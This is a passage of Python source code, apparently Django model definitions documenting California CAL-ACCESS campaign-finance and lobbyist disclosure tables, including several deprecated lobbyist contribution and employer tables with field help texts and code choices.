help_text="First line of the filer's street address."
)
cand_adr2 = fields.CharField(
db_column="CAND_ADR2",
blank=True,
max_length=55,
help_text="Second line of the filer's street address. "
)
cand_city = fields.CharField(
db_column="CAND_CITY",
blank=True,
max_length=30,
help_text="Candidate/Officeholder's City."
)
cand_email = fields.CharField(
db_column="CAND_EMAIL",
blank=True,
max_length=60,
help_text="Candidate/Officeholder's EMail address. Not required by the form."
)
cand_fax = fields.CharField(
db_column="CAND_FAX",
blank=True,
max_length=20,
help_text="Candidate/Officeholder's FAX Phone Number. Not required by the form."
)
cand_phon = fields.CharField(
db_column="CAND_PHON",
blank=True,
max_length=20,
help_text="Candidate/Officeholder's phone number."
)
cand_st = fields.CharField(
db_column="CAND_ST",
blank=True,
max_length=2,
help_text="Filer's State"
)
cand_zip4 = fields.CharField(
db_column="CAND_ZIP4",
blank=True,
max_length=10,
help_text="Filer's zipcode"
)
date_1000 = fields.DateField(
db_column="DATE_1000",
help_text="Date contributions totaling $1,000 or more. (For the 470-S)"
)
dist_no = fields.CharField(
db_column="DIST_NO",
blank=True,
max_length=3,
help_text="District number for the office being sought. Populated for Senate, Assembly, "
"or Board of Equalization races."
)
elect_date = fields.DateField(
db_column="ELECT_DATE",
help_text="Date of the general election. Required for filings in even years."
)
ENTITY_CD_CHOICES = (
('CAO', annotations.choices.CAMPAIGN_ENTITY_CODES['CAO']),
)
entity_cd = fields.CharField(
db_column="ENTITY_CD",
blank=True,
choices=ENTITY_CD_CHOICES,
max_length=3,
help_text="The filer's entity code. The value of this column will always be "
"Candidate/Office Holder (CAO) for this table.",
documentcloud_pages=[
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=29)
]
)
filer_id = fields.CharField(
db_column="FILER_ID",
blank=True,
max_length=9,
help_text="Filer's unique identification number."
)
filer_namf = fields.CharField(
db_column="FILER_NAMF",
blank=True,
max_length=45,
help_text="Filer's First Name(s) - required for individuals"
)
filer_naml = fields.CharField(
db_column="FILER_NAML",
blank=True,
max_length=200,
help_text="Filer's Last Name/Committee name"
)
filer_nams = fields.CharField(
db_column="FILER_NAMS",
blank=True,
max_length=10,
help_text="Filer's Name Suffix"
)
filer_namt = fields.CharField(
db_column="FILER_NAMT",
blank=True,
max_length=10,
help_text="The filer's prefix or title that preceeds their name if they are an individual."
)
filing_id = fields.IntegerField(
db_column="FILING_ID",
db_index=True,
help_text="Unique filing identification number."
)
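    # Build the form-type choices from the FILING_FORMS annotations (db value -> full title).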
FORM_TYPE_CHOICES = tuple([(f.db_value, f.full_title) for f in FILING_FORMS])
form_type = fields.CharField(
db_column="FORM_TYPE",
choices=FORM_TYPE_CHOICES,
db_index=True,
max_length=4,
help_text="Type of Filing or Formset. The value of this column will always "
"be equal to F470.",
documentcloud_pages=[
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=29),
]
)
JURIS_CD_CHOICES = annotations.sort_choices(annotations.choices.JURIS_CODES)
juris_cd = fields.CharField(
db_column="JURIS_CD",
choices=JURIS_CD_CHOICES,
blank=True,
max_length=3,
help_text="Office Jurisdiction Code",
documentcloud_pages=[
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=29),
]
)
juris_dscr = fields.CharField(
db_column="JURIS_DSCR",
blank=True,
max_length=40,
help_text="Office jurisdiction description text reqired if the jurisdiction code "
"(Juris_cd) is equal to CIT, CTY, LOC, or OTH."
)
OFF_S_H_CD_CHOICES = annotations.sort_choices(annotations.choices.OFF_S_H_CODES)
off_s_h_cd = fields.CharField(
db_column="OFF_S_H_CD",
choices=OFF_S_H_CD_CHOICES,
blank=True,
max_length=1,
help_text='Office Sought/Held code. Legal values are "S" for sought and "H" for held.',
documentcloud_pages=[
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=30),
]
)
offic_dscr = fields.CharField(
db_column="OFFIC_DSCR",
blank=True,
max_length=40,
help_text="Office sought description used if the office code is other (OTH)."
)
OFFICE_CD_CODES = annotations.sort_choices(annotations.choices.OFFICE_CODES)
office_cd = fields.CharField(
db_column="OFFICE_CD",
choices=OFFICE_CD_CODES,
blank=True,
max_length=3,
help_text="Code that identifies the office being sought. See the CAL document for "
"a list of valid codes.",
documentcloud_pages=[
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=29),
]
)
REC_TYPE_CHOICES = (
('CVR', 'Cover Page'),
)
rec_type = fields.CharField(
db_column="REC_TYPE",
choices=REC_TYPE_CHOICES,
blank=True,
max_length=3,
help_text="Type of CAL record. This column will always contain CVR.",
documentcloud_pages=[
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=29),
]
)
report_num = fields.CharField(
db_column="REPORT_NUM",
blank=True,
max_length=3,
help_text="Report Number; 000 Original; 001-999 Amended as reported in the filing."
)
rpt_date = fields.DateField(
db_column="RPT_DATE",
db_index=True,
null=True,
help_text="Date this report is filed as reported by the filer."
)
def __str__(self):
return str(self.amend_id)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'CVR_F470_CD'
@python_2_unicode_compatible
class FilerTypePeriodsCd(CalAccessBaseModel):
"""
Undocumented.
The table's official description contains this note: "J M needs to document. This is
in his list of tables designed for future enhancements."
"""
UNIQUE_KEY = (
"ELECTION_TYPE",
"FILER_TYPE",
"PERIOD_ID",
)
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=8),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=71),
]
ELECTION_TYPE_CHOICES = (
(0, 'N/A'),
(3001, 'GENERAL'),
(3002, 'PRIMARY'),
(3003, 'RECALL'),
(3004, 'SPECIAL ELECTION'),
(3005, 'OFFICEHOLDER'),
(3006, 'SPECIAL RUNOFF'),
)
election_type = fields.IntegerField(
db_column="ELECTION_TYPE",
db_index=True,
choices=ELECTION_TYPE_CHOICES,
help_text="Election type",
documentcloud_pages=[
DocumentCloud(id='2774529-Lookup-Codes-Cd', start_page=3, end_page=4),
],
)
filer_type = fields.ForeignKeyField(
'FilerTypesCd',
related_name='filing_type_periods',
db_constraint=False,
db_column="FILER_TYPE",
db_index=True,
help_text="Foreign key referencing FilerTypesCd.filer_type",
on_delete=models.CASCADE
)
period_id = fields.ForeignKeyField(
'FilingPeriodCd',
related_name='filing_type_periods',
db_constraint=False,
db_column="PERIOD_ID",
db_index=True,
help_text="Foreign key referencing FilingPeriodCd.period_id",
on_delete=models.CASCADE
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'FILER_TYPE_PERIODS_CD'
def __str__(self):
return str(self.election_type)
@python_2_unicode_compatible
class LobbyistContributions1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of campaign contributions made by lobbyists.
This table is 95 percent identical to LOBBYIST_CONTRIBUTIONS2_CD and LOBBYIST_CONTRIBUTIONS3_CD.
According to "Cal-Access Tables, Columns, Indexes", this is a temporary
table used to generate the actual Lobbyist contribution disclosure table,
which is LOBBYIST_CONTRIBUTIONS3_CD.
    Also, the most recent values observed in FILING_PERIOD_START_DT are from
    April 2001, so this table is probably no longer in use.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id="2711614-CalAccessTablesWeb", start_page=10),
DocumentCloud(id="2711614-CalAccessTablesWeb", start_page=92, end_page=93),
]
filer_id = fields.IntegerField(
verbose_name='filer ID',
db_column='FILER_ID',
null=True,
db_index=True,
help_text="Filer's unique identification number",
)
filing_period_start_dt = fields.DateField(
null=True,
db_column='FILING_PERIOD_START_DT',
verbose_name='Filing period start date',
help_text='Start date of filing period',
)
filing_period_end_dt = fields.DateField(
db_column='FILING_PERIOD_END_DT',
null=True,
verbose_name='Filing period end date',
help_text='End date of filing period',
)
contribution_dt = fields.CharField(
db_column='CONTRIBUTION_DT',
max_length=32,
blank=True,
verbose_name='Contribution date',
help_text='Date of contribution',
)
recipient_name = fields.CharField(
db_column='RECIPIENT_NAME',
max_length=106,
blank=True,
help_text="Recipient's name"
)
recipient_id = fields.IntegerField(
db_column='RECIPIENT_ID',
blank=True,
null=True,
help_text="Recipient's identification number"
)
amount = fields.FloatField(
db_column='AMOUNT',
blank=True,
null=True,
help_text="Amount received"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_CONTRIBUTIONS1_CD'
ordering = ("-filing_period_start_dt",)
def __str__(self):
return str(self.filer_id)
@python_2_unicode_compatible
class LobbyistContributions2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of campaign contributions made by lobbyists.
This table is 95 percent identical to LOBBYIST_CONTRIBUTIONS1_CD and LOBBYIST_CONTRIBUTIONS3_CD.
According to "Cal-Access Tables, Columns, Indexes", this is a temporary
table used to generate the actual Lobbyist contribution disclosure table,
which is LOBBYIST_CONTRIBUTIONS3_CD.
    Also, the most recent values observed in FILING_PERIOD_START_DT are from
    April 2001, so this table is probably no longer in use.
"""
UNIQUE_KEY = False
filer_id = fields.IntegerField(
verbose_name='filer ID',
db_column='FILER_ID',
null=True,
db_index=True,
help_text="Filer's unique identification number",
)
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=10, end_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=93, end_page=94),
]
filing_period_start_dt = fields.DateField(
null=True,
db_column='FILING_PERIOD_START_DT',
verbose_name='Filing period start date',
help_text='Start date of filing period',
)
filing_period_end_dt = fields.DateField(
db_column='FILING_PERIOD_END_DT',
null=True,
verbose_name='Filing period end date',
help_text='End date of filing period',
)
contribution_dt = fields.CharField(
db_column='CONTRIBUTION_DT',
max_length=32,
blank=True,
verbose_name='Contribution date',
help_text='Date of contribution',
)
recipient_name = fields.CharField(
db_column='RECIPIENT_NAME',
max_length=106,
blank=True,
help_text="Recipient's name"
)
recipient_id = fields.IntegerField(
db_column='RECIPIENT_ID',
blank=True,
null=True,
help_text="Recipient's identification number"
)
amount = fields.FloatField(
db_column='AMOUNT',
blank=True,
null=True,
help_text="Amount received"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_CONTRIBUTIONS2_CD'
ordering = ("-filing_period_start_dt",)
def __str__(self):
return str(self.filer_id)
@python_2_unicode_compatible
class LobbyistContributions3Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of campaign contributions made by lobbyists.
This table is 95 percent identical to LOBBYIST_CONTRIBUTIONS1_CD and LOBBYIST_CONTRIBUTIONS2_CD.
According to "Cal-Access Tables, Columns, Indexes", this is the actual
Lobbyist contribution disclosure table generated from the other two
temporary tables: LOBBYIST_CONTRIBUTIONS1_CD and LOBBYIST_CONTRIBUTIONS2_CD.
    Also, the most recent values observed in FILING_PERIOD_START_DT are from
    April 2001, so this table is probably no longer in use.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=94),
]
filer_id = fields.IntegerField(
verbose_name='filer ID',
db_column='FILER_ID',
null=True,
db_index=True,
help_text="Filer's unique identification number",
)
filing_period_start_dt = fields.DateField(
null=True,
db_column='FILING_PERIOD_START_DT',
verbose_name='Filing period start date',
help_text='Start date of filing period',
)
filing_period_end_dt = fields.DateField(
db_column='FILING_PERIOD_END_DT',
null=True,
verbose_name='Filing period end date',
help_text='End date of filing period',
)
contribution_dt = fields.CharField(
db_column='CONTRIBUTION_DT',
max_length=32,
blank=True,
verbose_name='Contribution date',
help_text='Date of contribution',
)
recipient_name = fields.CharField(
db_column='RECIPIENT_NAME',
max_length=106,
blank=True,
help_text="Recipient's name"
)
recipient_id = fields.IntegerField(
db_column='RECIPIENT_ID',
blank=True,
null=True,
help_text="Recipient's identification number"
)
amount = fields.FloatField(
db_column='AMOUNT',
blank=True,
null=True,
help_text="Amount received"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_CONTRIBUTIONS3_CD'
ordering = ("-filing_period_start_dt",)
def __str__(self):
return str(self.filer_id)
@python_2_unicode_compatible
class LobbyistEmpLobbyist1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMP_LOBBYIST2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=94, end_page=95),
]
lobbyist_id = fields.IntegerField(
db_column='LOBBYIST_ID',
verbose_name="Lobbyist ID",
help_text="Lobbyist identification number"
)
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
lobbyist_last_name = fields.CharField(
db_column='LOBBYIST_LAST_NAME',
max_length=17,
help_text="Lobbyist last name"
)
lobbyist_first_name = fields.CharField(
db_column='LOBBYIST_FIRST_NAME',
max_length=17,
help_text="Lobbyist first name"
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMP_LOBBYIST1_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.lobbyist_id)
@python_2_unicode_compatible
class LobbyistEmpLobbyist2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMP_LOBBYIST1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=95),
]
lobbyist_id = fields.IntegerField(
db_column='LOBBYIST_ID',
verbose_name="Lobbyist ID",
help_text="Lobbyist identification number"
)
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
lobbyist_last_name = fields.CharField(
db_column='LOBBYIST_LAST_NAME',
max_length=17,
help_text="Lobbyist last name"
)
lobbyist_first_name = fields.CharField(
db_column='LOBBYIST_FIRST_NAME',
max_length=17,
help_text="Lobbyist first name"
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMP_LOBBYIST2_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.lobbyist_id)
@python_2_unicode_compatible
class LobbyistEmployer1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is 99 percent identical to LOBBYIST_EMPLOYER2_CD and LOBBYIST_EMPLOYER3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
    Also, the only value observed in SESSION_YR_1 is 1999 and the only value
observed in SESSION_YR_2 is 2000.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=97, end_page=98),
]
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
current_qtr_amt = fields.FloatField(
db_column='CURRENT_QTR_AMT',
help_text="Current quarter amount"
)
session_total_amt = fields.FloatField(
db_column='SESSION_TOTAL_AMT',
help_text="Total amount for the session"
)
contributor_id = fields.IntegerField(
db_column='CONTRIBUTOR_ID',
blank=True,
null=True,
verbose_name="contributor ID",
help_text="Contributor identification number"
)
INTEREST_CD_CHOICES = (
(40301, 'AGRICULTURE'),
(40302, 'EDUCATION'),
(40303, 'ENTERTAINMENT/RECREATION'),
(40304, 'FINANCE/INSURANCE'),
(40305, 'GOVERNMENT'),
(40306, 'HEALTH'),
(40307, 'LABOR UNIONS'),
(40308, 'LEGAL'),
(40309, 'LODGING/RESTAURANTS'),
(40310, 'MANUFACTURING/INDUSTRIAL'),
(40311, 'MERCHANDISE/RETAIL'),
(40312, 'MISCELLANEOUS'),
(40313, 'OIL AND GAS'),
(40314, 'POLITICAL ORGANIZATIONS'),
(40315, 'PROFESSIONAL/TRADE'),
(40316, 'PUBLIC EMPLOYEES'),
(40317, 'REAL ESTATE'),
(40318, 'TRANSPORTATION'),
(40319, 'UTILITIES'),
)
interest_cd = fields.IntegerField(
db_column='INTEREST_CD',
choices=INTEREST_CD_CHOICES,
blank=True,
null=True,
verbose_name="interest code",
help_text='Interest Code',
documentcloud_pages=[
DocumentCloud(id='2774529-Lookup-Codes-Cd', start_page=19),
],
)
interest_name = fields.CharField(
db_column='INTEREST_NAME',
max_length=24,
blank=True,
verbose_name="Interest name",
help_text="Interest name",
)
session_yr_1 = fields.IntegerField(
db_column='SESSION_YR_1',
verbose_name="Total amount of year 1 of the session",
help_text="Total amount of year 1 of the session",
)
session_yr_2 = fields.IntegerField(
db_column='SESSION_YR_2',
verbose_name="Total amount of year 2 of the session",
help_text="Total amount of year 2 of the session",
)
yr_1_ytd_amt = fields.FloatField(
db_column='YR_1_YTD_AMT',
verbose_name="Year 1 year-to-date-amount",
help_text="Year 1 year-to-date-amount",
)
yr_2_ytd_amt = fields.FloatField(
db_column='YR_2_YTD_AMT',
verbose_name="Year 2 year-to-date-amount",
help_text="Year 2 year-to-date-amount",
)
qtr_1 = fields.FloatField(
db_column='QTR_1',
verbose_name="Quarter 1",
help_text="Quarter total amount",
)
qtr_2 = fields.FloatField(
db_column='QTR_2',
verbose_name="Quarter 2",
help_text="Quarter total amount",
)
qtr_3 = fields.FloatField(
db_column='QTR_3',
verbose_name="Quarter 3",
help_text="Quarter total amount",
)
qtr_4 = fields.FloatField(
db_column='QTR_4',
verbose_name="Quarter 4",
help_text="Quarter total amount",
)
qtr_5 = fields.FloatField(
db_column='QTR_5',
verbose_name="Quarter 5",
help_text="Quarter total amount",
)
qtr_6 = fields.FloatField(
db_column='QTR_6',
verbose_name="Quarter 6",
help_text="Quarter total amount",
)
qtr_7 = fields.FloatField(
db_column='QTR_7',
verbose_name="Quarter 7",
help_text="Quarter total amount",
)
qtr_8 = fields.FloatField(
db_column='QTR_8',
verbose_name="Quarter 8",
help_text="Quarter total amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMPLOYER1_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.employer_id)
@python_2_unicode_compatible
class LobbyistEmployer2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is 99 percent identical to LOBBYIST_EMPLOYER1_CD and LOBBYIST_EMPLOYER3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
    Also, the only value observed in SESSION_YR_1 is 1999 and the only value
observed in SESSION_YR_2 is 2000.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=98, end_page=99),
]
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
current_qtr_amt = fields.FloatField(
db_column='CURRENT_QTR_AMT',
help_text="Current quarter amount"
)
session_total_amt = fields.FloatField(
db_column='SESSION_TOTAL_AMT',
help_text="Total amount for the session"
)
contributor_id = fields.IntegerField(
db_column='CONTRIBUTOR_ID',
blank=True,
null=True,
verbose_name="contributor ID",
help_text="Contributor identification number"
)
INTEREST_CD_CHOICES = (
(40301, 'AGRICULTURE'),
(40302, 'EDUCATION'),
(40303, 'ENTERTAINMENT/RECREATION'),
(40304, 'FINANCE/INSURANCE'),
(40305, 'GOVERNMENT'),
(40306, 'HEALTH'),
(40307, 'LABOR UNIONS'),
(40308, 'LEGAL'),
(40309, 'LODGING/RESTAURANTS'),
(40310, 'MANUFACTURING/INDUSTRIAL'),
(40311, 'MERCHANDISE/RETAIL'),
(40312, 'MISCELLANEOUS'),
(40313, 'OIL AND GAS'),
(40314, 'POLITICAL ORGANIZATIONS'),
(40315, 'PROFESSIONAL/TRADE'),
(40316, 'PUBLIC EMPLOYEES'),
(40317, 'REAL ESTATE'),
(40318, 'TRANSPORTATION'),
(40319, 'UTILITIES'),
)
interest_cd = fields.IntegerField(
db_column='INTEREST_CD',
blank=True,
null=True,
choices=INTEREST_CD_CHOICES,
verbose_name="interest code",
help_text='Interest Code',
documentcloud_pages=[
DocumentCloud(id='2774529-Lookup-Codes-Cd', start_page=19),
],
)
interest_name = fields.CharField(
db_column='INTEREST_NAME',
max_length=24,
blank=True,
help_text="Interest name"
)
session_yr_1 = fields.IntegerField(
db_column='SESSION_YR_1',
verbose_name="Total amount of year 1 of the session",
help_text="Total amount of year 1 of the session",
)
session_yr_2 = fields.IntegerField(
db_column='SESSION_YR_2',
verbose_name="Total amount of year 2 of the session",
help_text="Total amount of year 2 of the session",
)
yr_1_ytd_amt = fields.FloatField(
db_column='YR_1_YTD_AMT',
verbose_name="Year 1 year-to-date-amount",
help_text="Year 1 year-to-date-amount",
)
yr_2_ytd_amt = fields.FloatField(
db_column='YR_2_YTD_AMT',
verbose_name="Year 2 year-to-date-amount",
help_text="Year 2 year-to-date-amount",
)
qtr_1 = fields.FloatField(
db_column='QTR_1',
verbose_name="Quarter 1",
help_text="Quarter 1 total amount",
)
qtr_2 = fields.FloatField(
db_column='QTR_2',
verbose_name="Quarter 2",
help_text="Quarter 2 total amount",
)
qtr_3 = fields.FloatField(
db_column='QTR_3',
verbose_name="Quarter 3",
help_text="Quarter 3 total amount",
)
qtr_4 = fields.FloatField(
db_column='QTR_4',
verbose_name="Quarter 4",
help_text="Quarter 4 total amount",
)
qtr_5 = fields.FloatField(
db_column='QTR_5',
verbose_name="Quarter 5",
help_text="Quarter 5 total amount",
)
qtr_6 = fields.FloatField(
db_column='QTR_6',
verbose_name="Quarter 6",
help_text="Quarter 6 total amount",
)
qtr_7 = fields.FloatField(
db_column='QTR_7',
verbose_name="Quarter 7",
help_text="Quarter 7 total amount",
)
qtr_8 = fields.FloatField(
db_column='QTR_8',
verbose_name="Quarter 8",
help_text="Quarter 8 total amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMPLOYER2_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.employer_id)
@python_2_unicode_compatible
class LobbyistEmployer3Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is 99 percent identical to LOBBYIST_EMPLOYER1_CD and LOBBYIST_EMPLOYER2_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
    Also, the only value observed in SESSION_YR_1 is 1999 and the only value
observed in SESSION_YR_2 is 2000.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=99),
]
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
current_qtr_amt = fields.FloatField(
db_column='CURRENT_QTR_AMT',
help_text="Current quarter amount"
)
session_total_amt = fields.FloatField(
db_column='SESSION_TOTAL_AMT',
help_text="Total amount for the session"
)
contributor_id = fields.IntegerField(
db_column='CONTRIBUTOR_ID',
blank=True,
null=True,
verbose_name="contributor ID",
help_text="Contributor identification number"
)
INTEREST_CD_CHOICES = (
(40301, 'AGRICULTURE'),
(40302, 'EDUCATION'),
(40303, 'ENTERTAINMENT/RECREATION'),
(40304, 'FINANCE/INSURANCE'),
(40305, 'GOVERNMENT'),
(40306, 'HEALTH'),
(40307, 'LABOR UNIONS'),
(40308, 'LEGAL'),
(40309, 'LODGING/RESTAURANTS'),
(40310, 'MANUFACTURING/INDUSTRIAL'),
(40311, 'MERCHANDISE/RETAIL'),
(40312, 'MISCELLANEOUS'),
(40313, 'OIL AND GAS'),
(40314, 'POLITICAL ORGANIZATIONS'),
(40315, 'PROFESSIONAL/TRADE'),
(40316, 'PUBLIC EMPLOYEES'),
(40317, 'REAL ESTATE'),
(40318, 'TRANSPORTATION'),
(40319, 'UTILITIES'),
)
interest_cd = fields.IntegerField(
db_column='INTEREST_CD',
blank=True,
null=True,
choices=INTEREST_CD_CHOICES,
verbose_name="interest code",
help_text='Interest Code',
documentcloud_pages=[
DocumentCloud(id='2774529-Lookup-Codes-Cd', start_page=19),
],
)
interest_name = fields.CharField(
db_column='INTEREST_NAME',
max_length=24,
blank=True,
help_text="Interest name"
)
session_yr_1 = fields.IntegerField(
db_column='SESSION_YR_1',
verbose_name="Total amount of year 1 of the session",
help_text="Total amount of year 1 of the session",
)
session_yr_2 = fields.IntegerField(
db_column='SESSION_YR_2',
verbose_name="Total amount of year 2 of the session",
help_text="Total amount of year 2 of the session",
)
yr_1_ytd_amt = fields.FloatField(
db_column='YR_1_YTD_AMT',
verbose_name="Year 1 year-to-date-amount",
help_text="Year 1 year-to-date-amount",
)
yr_2_ytd_amt = fields.FloatField(
db_column='YR_2_YTD_AMT',
verbose_name="Year 2 year-to-date-amount",
help_text="Year 2 year-to-date-amount",
)
qtr_1 = fields.FloatField(
db_column='QTR_1',
verbose_name="Quarter 1",
help_text="Quarter total amount",
)
qtr_2 = fields.FloatField(
db_column='QTR_2',
verbose_name="Quarter 2",
help_text="Quarter total amount",
)
qtr_3 = fields.FloatField(
db_column='QTR_3',
verbose_name="Quarter 3",
help_text="Quarter total amount",
)
qtr_4 = fields.FloatField(
db_column='QTR_4',
verbose_name="Quarter 4",
help_text="Quarter total amount",
)
qtr_5 = fields.FloatField(
db_column='QTR_5',
verbose_name="Quarter 5",
help_text="Quarter total amount",
)
qtr_6 = fields.FloatField(
db_column='QTR_6',
verbose_name="Quarter 6",
help_text="Quarter total amount",
)
qtr_7 = fields.FloatField(
db_column='QTR_7',
verbose_name="Quarter 7",
help_text="Quarter total amount",
)
qtr_8 = fields.FloatField(
db_column='QTR_8',
verbose_name="Quarter 8",
help_text="Quarter total amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMPLOYER3_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.employer_id)
@python_2_unicode_compatible
class LobbyistEmployerFirms1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMPLOYER_FIRMS2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
    Also, the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=95, end_page=96),
]
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
termination_dt = fields.CharField(
verbose_name='termination date',
db_column='TERMINATION_DT',
max_length=32,
blank=True,
help_text="Termination effective date"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
